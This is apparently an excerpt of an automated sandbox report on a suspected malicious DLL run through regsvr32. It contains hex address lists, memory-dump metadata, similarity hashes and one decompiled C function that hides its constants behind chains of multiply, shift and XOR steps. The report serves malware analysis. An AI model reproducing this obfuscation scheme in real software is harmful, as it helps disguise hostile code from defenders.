                                                                                                                0x1003942a
                                                                                                                0x10039434
                                                                                                                0x10039437
                                                                                                                0x10039445
                                                                                                                0x1003944c
                                                                                                                0x1003945b
                                                                                                                0x10039462
                                                                                                                0x1003946a
                                                                                                                0x1003946c
                                                                                                                0x1003946e
                                                                                                                0x10039471
                                                                                                                0x10039474
                                                                                                                0x10039477
                                                                                                                0x100394ca
                                                                                                                0x100394ca
                                                                                                                0x100394cd
                                                                                                                0x100395ff
                                                                                                                0x10039578
                                                                                                                0x1003957c
                                                                                                                0x10039581
                                                                                                                0x10039586
                                                                                                                0x10039588
                                                                                                                0x1003958a
                                                                                                                0x1003958d
                                                                                                                0x10039599
                                                                                                                0x10039599
                                                                                                                0x1003958d
                                                                                                                0x1003959f
                                                                                                                0x100395a5
                                                                                                                0x100395ab
                                                                                                                0x100395ae
                                                                                                                0x100395bb
                                                                                                                0x100395be
                                                                                                                0x100395c3
                                                                                                                0x100395c3
                                                                                                                0x100395cb
                                                                                                                0x100395cc
                                                                                                                0x100395cf
                                                                                                                0x100395cf
                                                                                                                0x100395d1
                                                                                                                0x100395d1
                                                                                                                0x100395d5
                                                                                                                0x100395db
                                                                                                                0x100395df
                                                                                                                0x100395e5
                                                                                                                0x100395e8
                                                                                                                0x100395ed
                                                                                                                0x100395df
                                                                                                                0x00000000
                                                                                                                0x100395d5
                                                                                                                0x100394d8
                                                                                                                0x100394e2
                                                                                                                0x100394e2
                                                                                                                0x100394e4
                                                                                                                0x100394e7
                                                                                                                0x100394f1
                                                                                                                0x100394f4
                                                                                                                0x100394fa
                                                                                                                0x100394fc
                                                                                                                0x100394fc
                                                                                                                0x100394ff
                                                                                                                0x100394ff
                                                                                                                0x10039517
                                                                                                                0x1003951d
                                                                                                                0x10039524
                                                                                                                0x10039532
                                                                                                                0x1003953d
                                                                                                                0x10039543
                                                                                                                0x10039546
                                                                                                                0x10039549
                                                                                                                0x1003955c
                                                                                                                0x1003955c
                                                                                                                0x1003956f
                                                                                                                0x00000000
                                                                                                                0x10039526
                                                                                                                0x10039529
                                                                                                                0x1003952e
                                                                                                                0x10039530
                                                                                                                0x10039575
                                                                                                                0x10039575
                                                                                                                0x00000000
                                                                                                                0x10039575
                                                                                                                0x00000000
                                                                                                                0x10039530
                                                                                                                0x10039524
                                                                                                                0x10039479
                                                                                                                0x1003947c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003947e
                                                                                                                0x10039484
                                                                                                                0x100394b3
                                                                                                                0x100394b6
                                                                                                                0x100394c0
                                                                                                                0x100394c0
                                                                                                                0x10039486
                                                                                                                0x1003948a
                                                                                                                0x100394a8
                                                                                                                0x100394a8
                                                                                                                0x00000000
                                                                                                                0x100393e8
                                                                                                                0x100393ee
                                                                                                                0x00000000
                                                                                                                0x100393ee
                                                                                                                0x100393e6
                                                                                                                0x10039391
                                                                                                                0x10039396
                                                                                                                0x10039399
                                                                                                                0x1003939f
                                                                                                                0x100393a8
                                                                                                                0x100393ab
                                                                                                                0x100393ab
                                                                                                                0x100393ad
                                                                                                                0x100393ad
                                                                                                                0x100393b0
                                                                                                                0x100393b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003936a
                                                                                                                0x1003936c
                                                                                                                0x10039372
                                                                                                                0x10039375
                                                                                                                0x10039375
                                                                                                                0x00000000
                                                                                                                0x1003936c
                                                                                                                0x10039368
                                                                                                                0x10039337
                                                                                                                0x1003960d
                                                                                                                0x1003960d
                                                                                                                0x1003960d
                                                                                                                0x10039613
                                                                                                                0x100396d8
                                                                                                                0x100396dd
                                                                                                                0x100396dd
                                                                                                                0x10039619
                                                                                                                0x10039633
                                                                                                                0x10039633
                                                                                                                0x10039638
                                                                                                                0x1003963a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003961d
                                                                                                                0x1003961f
                                                                                                                0x10039644
                                                                                                                0x10039644
                                                                                                                0x1003964a
                                                                                                                0x10039654
                                                                                                                0x1003965a
                                                                                                                0x1003965d
                                                                                                                0x10039664
                                                                                                                0x10039664
                                                                                                                0x10039666
                                                                                                                0x10039666
                                                                                                                0x1003966c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003966e
                                                                                                                0x10039670
                                                                                                                0x100396d2
                                                                                                                0x100396d3
                                                                                                                0x00000000
                                                                                                                0x100396d3
                                                                                                                0x10039672
                                                                                                                0x10039678
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003967a
                                                                                                                0x10039680
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039682
                                                                                                                0x10039688
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003968a
                                                                                                                0x10039690
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039692
                                                                                                                0x10039698
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003969a
                                                                                                                0x100396a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396a2
                                                                                                                0x100396a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396aa
                                                                                                                0x100396b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396b2
                                                                                                                0x100396b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396ba
                                                                                                                0x100396c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396c2
                                                                                                                0x100396c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396ca
                                                                                                                0x100396d0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396d0
                                                                                                                0x1003965f
                                                                                                                0x10039661
                                                                                                                0x00000000
                                                                                                                0x10039661
                                                                                                                0x1003964c
                                                                                                                0x10039652
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039652
                                                                                                                0x10039621
                                                                                                                0x10039627
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039632
                                                                                                                0x10039632
                                                                                                                0x1003963c
                                                                                                                0x1003963e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003963e

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2864161637-3887548279
                                                                                                                • Opcode ID: 7da60bfdff267e6b7c4e47dcfc54ad25e16cfe49b3ceb7a364a6153053e1811c
                                                                                                                • Instruction ID: 5ccd009687c04cb6e758ef9d5c2076c28791b587b2bada6c16d7db9d2372eb1a
                                                                                                                • Opcode Fuzzy Hash: 7da60bfdff267e6b7c4e47dcfc54ad25e16cfe49b3ceb7a364a6153053e1811c
                                                                                                                • Instruction Fuzzy Hash: D9C1AD71B01615AFEF52CFA4CC8AB9E77B5FF08392F110125EA16AF1A1D770A980CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B0503(intOrPtr* __ecx) {
                                                                                                                				char _v68;
                                                                                                                				char _v76;
                                                                                                                				char _v80;
                                                                                                                				intOrPtr* _v84;
                                                                                                                				char _v88;
                                                                                                                				char _v92;
                                                                                                                				char _v96;
                                                                                                                				char _v100;
                                                                                                                				char _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				signed int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				signed int _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				signed int _v356;
                                                                                                                				signed int _v360;
                                                                                                                				signed int _v364;
                                                                                                                				signed int _v368;
                                                                                                                				signed int _v372;
                                                                                                                				signed int _v376;
                                                                                                                				signed int _v380;
                                                                                                                				signed int _v384;
                                                                                                                				signed int _v388;
                                                                                                                				signed int _v392;
                                                                                                                				signed int _v396;
                                                                                                                				signed int _v400;
                                                                                                                				signed int _v404;
                                                                                                                				signed int _v408;
                                                                                                                				signed int _v412;
                                                                                                                				signed int _v416;
                                                                                                                				signed int _v420;
                                                                                                                				signed int _v424;
                                                                                                                				signed int _v428;
                                                                                                                				signed int _v432;
                                                                                                                				signed int _v436;
                                                                                                                				signed int _v440;
                                                                                                                				signed int _v444;
                                                                                                                				signed int _v448;
                                                                                                                				void* _t891;
                                                                                                                				void* _t894;
                                                                                                                				void* _t900;
                                                                                                                				intOrPtr _t902;
                                                                                                                				void* _t908;
                                                                                                                				void* _t910;
                                                                                                                				void* _t912;
                                                                                                                				void* _t915;
                                                                                                                				void* _t929;
                                                                                                                				signed int _t936;
                                                                                                                				signed int _t937;
                                                                                                                				signed int _t938;
                                                                                                                				signed int _t939;
                                                                                                                				signed int _t940;
                                                                                                                				signed int _t941;
                                                                                                                				signed int _t942;
                                                                                                                				signed int _t943;
                                                                                                                				signed int _t944;
                                                                                                                				signed int _t945;
                                                                                                                				signed int _t946;
                                                                                                                				signed int _t947;
                                                                                                                				signed int _t948;
                                                                                                                				signed int _t949;
                                                                                                                				signed int _t950;
                                                                                                                				signed int _t951;
                                                                                                                				signed int _t952;
                                                                                                                				signed int _t953;
                                                                                                                				signed int _t954;
                                                                                                                				signed int _t955;
                                                                                                                				signed int _t956;
                                                                                                                				signed int _t957;
                                                                                                                				signed int _t958;
                                                                                                                				signed int _t959;
                                                                                                                				signed int _t960;
                                                                                                                				signed int _t961;
                                                                                                                				signed int _t962;
                                                                                                                				void* _t968;
                                                                                                                				void* _t993;
                                                                                                                				void* _t1053;
                                                                                                                				intOrPtr* _t1073;
                                                                                                                				signed int _t1075;
                                                                                                                				void* _t1076;
                                                                                                                				void* _t1080;
                                                                                                                				void* _t1081;
                                                                                                                				void* _t1087;
                                                                                                                
                                                                                                                				_t1073 = __ecx;
                                                                                                                				_v84 = __ecx;
                                                                                                                				_v408 = 0xdcbd13;
                                                                                                                				_v408 = _v408 * 0x2c;
                                                                                                                				_v408 = _v408 ^ 0x9fa068a9;
                                                                                                                				_t1080 = 0;
                                                                                                                				_v408 = _v408 + 0x2b5c;
                                                                                                                				_t929 = 0xd000b28;
                                                                                                                				_v408 = _v408 ^ 0xba504349;
                                                                                                                				_v136 = 0x8217ac;
                                                                                                                				_v136 = _v136 << 4;
                                                                                                                				_v136 = _v136 ^ 0x08217ac0;
                                                                                                                				_v120 = 0x3140f2;
                                                                                                                				_v120 = _v120 >> 2;
                                                                                                                				_v120 = _v120 ^ 0x000c503c;
                                                                                                                				_v232 = 0x67c070;
                                                                                                                				_v232 = _v232 ^ 0x0fc20f40;
                                                                                                                				_v232 = _v232 ^ 0x0fa5cf30;
                                                                                                                				_v164 = 0x4501eb;
                                                                                                                				_v164 = _v164 | 0xaf0220db;
                                                                                                                				_v164 = _v164 ^ 0xaf4721fb;
                                                                                                                				_v148 = 0xaa80f2;
                                                                                                                				_v148 = _v148 + 0xffffa89e;
                                                                                                                				_v148 = _v148 ^ 0x00aa2990;
                                                                                                                				_v196 = 0xa41f1c;
                                                                                                                				_v196 = _v196 ^ 0xc80d6d99;
                                                                                                                				_v196 = _v196 ^ 0xc8a97285;
                                                                                                                				_v404 = 0x19596a;
                                                                                                                				_v404 = _v404 << 4;
                                                                                                                				_t936 = 0x7f;
                                                                                                                				_v404 = _v404 / _t936;
                                                                                                                				_v404 = _v404 + 0xffff843f;
                                                                                                                				_v404 = _v404 ^ 0x0002b5cf;
                                                                                                                				_v432 = 0x75da42;
                                                                                                                				_v432 = _v432 ^ 0x7700d48f;
                                                                                                                				_v432 = _v432 | 0x189e2cc9;
                                                                                                                				_v432 = _v432 * 0x3f;
                                                                                                                				_v432 = _v432 ^ 0x7fcc8473;
                                                                                                                				_v216 = 0x9289cb;
                                                                                                                				_v216 = _v216 * 0x5a;
                                                                                                                				_v216 = _v216 ^ 0x3384715e;
                                                                                                                				_v296 = 0x4385cb;
                                                                                                                				_v296 = _v296 + 0x68d6;
                                                                                                                				_v296 = _v296 >> 0xf;
                                                                                                                				_v296 = _v296 ^ 0x00000087;
                                                                                                                				_v140 = 0x7abe17;
                                                                                                                				_v140 = _v140 * 0x46;
                                                                                                                				_v140 = _v140 ^ 0x218ffa4a;
                                                                                                                				_v316 = 0xdc0bd1;
                                                                                                                				_v316 = _v316 ^ 0xf61b824a;
                                                                                                                				_v316 = _v316 * 0xd;
                                                                                                                				_v316 = _v316 ^ 0x882386c3;
                                                                                                                				_v260 = 0x42d713;
                                                                                                                				_v260 = _v260 ^ 0x3fb9ebbf;
                                                                                                                				_v260 = _v260 << 6;
                                                                                                                				_v260 = _v260 ^ 0xfec4baad;
                                                                                                                				_v384 = 0x210b88;
                                                                                                                				_v384 = _v384 >> 3;
                                                                                                                				_v384 = _v384 + 0xfffff2fe;
                                                                                                                				_v384 = _v384 * 0x11;
                                                                                                                				_v384 = _v384 ^ 0x004a4663;
                                                                                                                				_v208 = 0xa6dde0;
                                                                                                                				_v208 = _v208 << 1;
                                                                                                                				_v208 = _v208 ^ 0x0145ee8f;
                                                                                                                				_v308 = 0x5fa396;
                                                                                                                				_v308 = _v308 << 0xc;
                                                                                                                				_v308 = _v308 * 0x4c;
                                                                                                                				_v308 = _v308 ^ 0x49078b95;
                                                                                                                				_v416 = 0xba9c37;
                                                                                                                				_t937 = 0x43;
                                                                                                                				_v416 = _v416 / _t937;
                                                                                                                				_v416 = _v416 >> 3;
                                                                                                                				_v416 = _v416 ^ 0xa5e5f9a3;
                                                                                                                				_v416 = _v416 ^ 0xa5e8835c;
                                                                                                                				_v276 = 0x3c3cf3;
                                                                                                                				_v276 = _v276 >> 7;
                                                                                                                				_t938 = 6;
                                                                                                                				_v276 = _v276 * 0x35;
                                                                                                                				_v276 = _v276 ^ 0x001a85ca;
                                                                                                                				_v236 = 0x1d3562;
                                                                                                                				_v236 = _v236 << 2;
                                                                                                                				_v236 = _v236 ^ 0x0078b008;
                                                                                                                				_v300 = 0x3bd319;
                                                                                                                				_v300 = _v300 ^ 0x74442c22;
                                                                                                                				_t143 =  &_v300; // 0x74442c22
                                                                                                                				_v300 =  *_t143 / _t938;
                                                                                                                				_v300 = _v300 ^ 0x13624aba;
                                                                                                                				_v352 = 0x483b69;
                                                                                                                				_t152 =  &_v352; // 0x483b69
                                                                                                                				_t939 = 0x32;
                                                                                                                				_v352 =  *_t152 / _t939;
                                                                                                                				_v352 = _v352 ^ 0x0f7391c0;
                                                                                                                				_t940 = 0x3c;
                                                                                                                				_v352 = _v352 * 0x5d;
                                                                                                                				_v352 = _v352 ^ 0x9cb37344;
                                                                                                                				_v244 = 0x8c6f57;
                                                                                                                				_v244 = _v244 / _t940;
                                                                                                                				_v244 = _v244 << 3;
                                                                                                                				_v244 = _v244 ^ 0x001b8794;
                                                                                                                				_v200 = 0xfefccc;
                                                                                                                				_v200 = _v200 | 0xadc82419;
                                                                                                                				_v200 = _v200 ^ 0xadfa7f46;
                                                                                                                				_v268 = 0x259b5a;
                                                                                                                				_v268 = _v268 + 0xffffb4dc;
                                                                                                                				_v268 = _v268 << 1;
                                                                                                                				_v268 = _v268 ^ 0x00481c3a;
                                                                                                                				_v184 = 0x1d8382;
                                                                                                                				_v184 = _v184 ^ 0xe214a976;
                                                                                                                				_v184 = _v184 ^ 0xe20aeaac;
                                                                                                                				_v108 = 0x322658;
                                                                                                                				_v108 = _v108 ^ 0xb3215236;
                                                                                                                				_v108 = _v108 ^ 0xb314ed55;
                                                                                                                				_v192 = 0xd0e37f;
                                                                                                                				_v192 = _v192 | 0xea7c68cb;
                                                                                                                				_v192 = _v192 ^ 0xeaf1932b;
                                                                                                                				_v340 = 0x4ec88d;
                                                                                                                				_v340 = _v340 | 0x7def4379;
                                                                                                                				_v340 = _v340 ^ 0x7dee2cc9;
                                                                                                                				_v176 = 0x9a25f4;
                                                                                                                				_v176 = _v176 >> 4;
                                                                                                                				_v176 = _v176 ^ 0x000b053a;
                                                                                                                				_v128 = 0x47e367;
                                                                                                                				_v128 = _v128 | 0x8594dd23;
                                                                                                                				_v128 = _v128 ^ 0x85d2f1bf;
                                                                                                                				_v292 = 0x1f0c9a;
                                                                                                                				_v292 = _v292 >> 0xa;
                                                                                                                				_v292 = _v292 * 0x50;
                                                                                                                				_v292 = _v292 ^ 0x00098dd6;
                                                                                                                				_v132 = 0x2535c6;
                                                                                                                				_v132 = _v132 + 0x6441;
                                                                                                                				_v132 = _v132 ^ 0x00275336;
                                                                                                                				_v160 = 0x683362;
                                                                                                                				_v160 = _v160 | 0x6eccd198;
                                                                                                                				_v160 = _v160 ^ 0x6ee99dcb;
                                                                                                                				_v320 = 0xb4168e;
                                                                                                                				_v320 = _v320 | 0x3e248d21;
                                                                                                                				_v320 = _v320 >> 1;
                                                                                                                				_v320 = _v320 ^ 0x1f5df3b0;
                                                                                                                				_v156 = 0xa84009;
                                                                                                                				_t941 = 0x19;
                                                                                                                				_v156 = _v156 / _t941;
                                                                                                                				_v156 = _v156 ^ 0x000281e4;
                                                                                                                				_v372 = 0xe06e;
                                                                                                                				_v372 = _v372 >> 0xa;
                                                                                                                				_v372 = _v372 + 0xffffb8e0;
                                                                                                                				_v372 = _v372 << 0xe;
                                                                                                                				_v372 = _v372 ^ 0xee47a634;
                                                                                                                				_v380 = 0xf39f5d;
                                                                                                                				_v380 = _v380 + 0xffffde02;
                                                                                                                				_v380 = _v380 + 0xffff94fc;
                                                                                                                				_v380 = _v380 ^ 0x0a9af6d5;
                                                                                                                				_v380 = _v380 ^ 0x0a61b720;
                                                                                                                				_v264 = 0xca2342;
                                                                                                                				_t942 = 0x38;
                                                                                                                				_t1075 = 0x4b;
                                                                                                                				_v264 = _v264 * 0x67;
                                                                                                                				_v264 = _v264 >> 8;
                                                                                                                				_v264 = _v264 ^ 0x005b75da;
                                                                                                                				_v220 = 0xe375df;
                                                                                                                				_v220 = _v220 << 0xf;
                                                                                                                				_v220 = _v220 ^ 0xbaead6ae;
                                                                                                                				_v428 = 0x9948c;
                                                                                                                				_v428 = _v428 + 0xffff8057;
                                                                                                                				_v428 = _v428 + 0xffff7a4f;
                                                                                                                				_v428 = _v428 / _t942;
                                                                                                                				_v428 = _v428 ^ 0x00028132;
                                                                                                                				_v272 = 0x9fc6c4;
                                                                                                                				_v272 = _v272 / _t1075;
                                                                                                                				_v272 = _v272 + 0xfffff7c2;
                                                                                                                				_v272 = _v272 ^ 0x00029ac0;
                                                                                                                				_v412 = 0x702983;
                                                                                                                				_v412 = _v412 + 0xffffc448;
                                                                                                                				_t943 = 3;
                                                                                                                				_v412 = _v412 / _t943;
                                                                                                                				_v412 = _v412 + 0x2a23;
                                                                                                                				_v412 = _v412 ^ 0x002a58c9;
                                                                                                                				_v256 = 0xd025cc;
                                                                                                                				_v256 = _v256 / _t1075;
                                                                                                                				_v256 = _v256 | 0x6b25516d;
                                                                                                                				_v256 = _v256 ^ 0x6b230984;
                                                                                                                				_v204 = 0xf56d4c;
                                                                                                                				_v204 = _v204 + 0xa994;
                                                                                                                				_v204 = _v204 ^ 0x00f7552e;
                                                                                                                				_v420 = 0xbe5e0e;
                                                                                                                				_v420 = _v420 ^ 0x768a176b;
                                                                                                                				_v420 = _v420 | 0xf3a5928d;
                                                                                                                				_v420 = _v420 ^ 0x926f3859;
                                                                                                                				_v420 = _v420 ^ 0x65ddee5a;
                                                                                                                				_v212 = 0x2f1b22;
                                                                                                                				_v212 = _v212 | 0x36e9c8a5;
                                                                                                                				_v212 = _v212 ^ 0x36eb3d71;
                                                                                                                				_v180 = 0x9d012e;
                                                                                                                				_v180 = _v180 >> 3;
                                                                                                                				_v180 = _v180 ^ 0x0013a789;
                                                                                                                				_v396 = 0x2ecbc9;
                                                                                                                				_v396 = _v396 + 0xb013;
                                                                                                                				_v396 = _v396 + 0xffff1e6e;
                                                                                                                				_v396 = _v396 ^ 0x3b0a35fd;
                                                                                                                				_v396 = _v396 ^ 0x3b2027c2;
                                                                                                                				_v188 = 0x6a7b31;
                                                                                                                				_v188 = _v188 >> 0xb;
                                                                                                                				_v188 = _v188 ^ 0x00005d78;
                                                                                                                				_v172 = 0x139356;
                                                                                                                				_t944 = 0x3e;
                                                                                                                				_v172 = _v172 * 0x54;
                                                                                                                				_v172 = _v172 ^ 0x0664671f;
                                                                                                                				_v388 = 0xf8060b;
                                                                                                                				_v388 = _v388 / _t944;
                                                                                                                				_t945 = 0x1b;
                                                                                                                				_v388 = _v388 / _t945;
                                                                                                                				_v388 = _v388 ^ 0x52ea613f;
                                                                                                                				_v388 = _v388 ^ 0x52e1ab72;
                                                                                                                				_v240 = 0x49a9c2;
                                                                                                                				_v240 = _v240 | 0xac7f8aa4;
                                                                                                                				_v240 = _v240 + 0xffffed5c;
                                                                                                                				_v240 = _v240 ^ 0xac73f442;
                                                                                                                				_v248 = 0x656f20;
                                                                                                                				_t396 =  &_v248; // 0x656f20
                                                                                                                				_t946 = 0x16;
                                                                                                                				_v248 =  *_t396 * 0x1b;
                                                                                                                				_t398 =  &_v248; // 0x656f20
                                                                                                                				_v248 =  *_t398 * 0x5d;
                                                                                                                				_v248 = _v248 ^ 0xe2ea5bea;
                                                                                                                				_v360 = 0x69eb4e;
                                                                                                                				_v360 = _v360 + 0xffffc199;
                                                                                                                				_v360 = _v360 * 0x37;
                                                                                                                				_v360 = _v360 >> 3;
                                                                                                                				_v360 = _v360 ^ 0x02d5e6f0;
                                                                                                                				_v116 = 0x5a0c82;
                                                                                                                				_v116 = _v116 | 0x5f967149;
                                                                                                                				_v116 = _v116 ^ 0x5fd153ac;
                                                                                                                				_v252 = 0xc50c6e;
                                                                                                                				_v252 = _v252 + 0xffff3d38;
                                                                                                                				_v252 = _v252 << 0x10;
                                                                                                                				_v252 = _v252 ^ 0x49a8a7b6;
                                                                                                                				_v288 = 0xf16b72;
                                                                                                                				_v288 = _v288 << 5;
                                                                                                                				_v288 = _v288 / _t946;
                                                                                                                				_v288 = _v288 ^ 0x01535cb6;
                                                                                                                				_v424 = 0x190e27;
                                                                                                                				_v424 = _v424 >> 0xa;
                                                                                                                				_t947 = 0x7f;
                                                                                                                				_v424 = _v424 * 0x32;
                                                                                                                				_v424 = _v424 | 0x0e64d2e8;
                                                                                                                				_v424 = _v424 ^ 0x0e6330f3;
                                                                                                                				_v124 = 0x82dc64;
                                                                                                                				_v124 = _v124 + 0x59d0;
                                                                                                                				_v124 = _v124 ^ 0x00809703;
                                                                                                                				_v368 = 0x532036;
                                                                                                                				_v368 = _v368 / _t947;
                                                                                                                				_v368 = _v368 ^ 0xabb15eca;
                                                                                                                				_v368 = _v368 ^ 0xb1aa33e6;
                                                                                                                				_v368 = _v368 ^ 0x1a11b223;
                                                                                                                				_v224 = 0x85a5e0;
                                                                                                                				_v224 = _v224 | 0x8f625e6c;
                                                                                                                				_v224 = _v224 ^ 0x8fed7ce8;
                                                                                                                				_v392 = 0x6bbefa;
                                                                                                                				_v392 = _v392 + 0x83d3;
                                                                                                                				_t948 = 0x2f;
                                                                                                                				_v392 = _v392 * 0x19;
                                                                                                                				_v392 = _v392 << 0xd;
                                                                                                                				_v392 = _v392 ^ 0x50ce0660;
                                                                                                                				_v440 = 0xdb3332;
                                                                                                                				_v440 = _v440 ^ 0x35e94d80;
                                                                                                                				_v440 = _v440 >> 2;
                                                                                                                				_v440 = _v440 >> 0xa;
                                                                                                                				_v440 = _v440 ^ 0x000e8a12;
                                                                                                                				_v152 = 0x7c17c3;
                                                                                                                				_v152 = _v152 + 0xcc70;
                                                                                                                				_v152 = _v152 ^ 0x007c0747;
                                                                                                                				_v324 = 0xca910e;
                                                                                                                				_v324 = _v324 * 0x57;
                                                                                                                				_v324 = _v324 << 9;
                                                                                                                				_v324 = _v324 ^ 0xae90991e;
                                                                                                                				_v144 = 0xed532b;
                                                                                                                				_v144 = _v144 | 0x70aef639;
                                                                                                                				_v144 = _v144 ^ 0x70e9c08c;
                                                                                                                				_v284 = 0xd9fe9a;
                                                                                                                				_v284 = _v284 / _t948;
                                                                                                                				_v284 = _v284 + 0xbf07;
                                                                                                                				_v284 = _v284 ^ 0x00019afa;
                                                                                                                				_v332 = 0xe0663d;
                                                                                                                				_v332 = _v332 + 0xe2e6;
                                                                                                                				_v332 = _v332 + 0xffff4fed;
                                                                                                                				_v332 = _v332 ^ 0x00ee3e0b;
                                                                                                                				_v304 = 0x883e3e;
                                                                                                                				_v304 = _v304 << 8;
                                                                                                                				_v304 = _v304 >> 0xe;
                                                                                                                				_v304 = _v304 ^ 0x0002f2f4;
                                                                                                                				_v312 = 0x476ea6;
                                                                                                                				_v312 = _v312 + 0xea5a;
                                                                                                                				_t949 = 0x60;
                                                                                                                				_v312 = _v312 / _t949;
                                                                                                                				_v312 = _v312 ^ 0x000789b0;
                                                                                                                				_v228 = 0xd1112e;
                                                                                                                				_t950 = 6;
                                                                                                                				_v228 = _v228 / _t950;
                                                                                                                				_v228 = _v228 ^ 0x002ddd98;
                                                                                                                				_v448 = 0x74e7fb;
                                                                                                                				_v448 = _v448 << 0xf;
                                                                                                                				_v448 = _v448 ^ 0x083c0224;
                                                                                                                				_t951 = 0xe;
                                                                                                                				_v448 = _v448 / _t951;
                                                                                                                				_v448 = _v448 ^ 0x08d5b0a2;
                                                                                                                				_v328 = 0xb30da3;
                                                                                                                				_t952 = 0x51;
                                                                                                                				_v328 = _v328 / _t952;
                                                                                                                				_v328 = _v328 + 0xffff16f6;
                                                                                                                				_v328 = _v328 ^ 0x0003878e;
                                                                                                                				_v336 = 0xeb24d9;
                                                                                                                				_v336 = _v336 >> 6;
                                                                                                                				_v336 = _v336 | 0x93901690;
                                                                                                                				_v336 = _v336 ^ 0x93998dde;
                                                                                                                				_v436 = 0x3822a3;
                                                                                                                				_v436 = _v436 + 0xcee2;
                                                                                                                				_v436 = _v436 ^ 0x810052d2;
                                                                                                                				_t953 = 0x33;
                                                                                                                				_v436 = _v436 / _t953;
                                                                                                                				_v436 = _v436 ^ 0x028f8bb9;
                                                                                                                				_v444 = 0x657637;
                                                                                                                				_t954 = 0x50;
                                                                                                                				_v444 = _v444 / _t954;
                                                                                                                				_v444 = _v444 << 9;
                                                                                                                				_t955 = 0x27;
                                                                                                                				_v444 = _v444 / _t955;
                                                                                                                				_v444 = _v444 ^ 0x001d5e8d;
                                                                                                                				_v280 = 0xdf6806;
                                                                                                                				_t956 = 0x70;
                                                                                                                				_v280 = _v280 / _t956;
                                                                                                                				_v280 = _v280 + 0xffff6aaa;
                                                                                                                				_v280 = _v280 ^ 0x000f185a;
                                                                                                                				_v344 = 0x572d4;
                                                                                                                				_v344 = _v344 ^ 0xbbe28ac2;
                                                                                                                				_t957 = 0x65;
                                                                                                                				_v344 = _v344 * 0x19;
                                                                                                                				_v344 = _v344 ^ 0x59aa8056;
                                                                                                                				_v168 = 0xc8e49c;
                                                                                                                				_v168 = _v168 / _t957;
                                                                                                                				_v168 = _v168 ^ 0x00047aef;
                                                                                                                				_v400 = 0x521f3b;
                                                                                                                				_v400 = _v400 ^ 0xf63b9b64;
                                                                                                                				_v400 = _v400 ^ 0x9c3d7bea;
                                                                                                                				_v400 = _v400 + 0x3385;
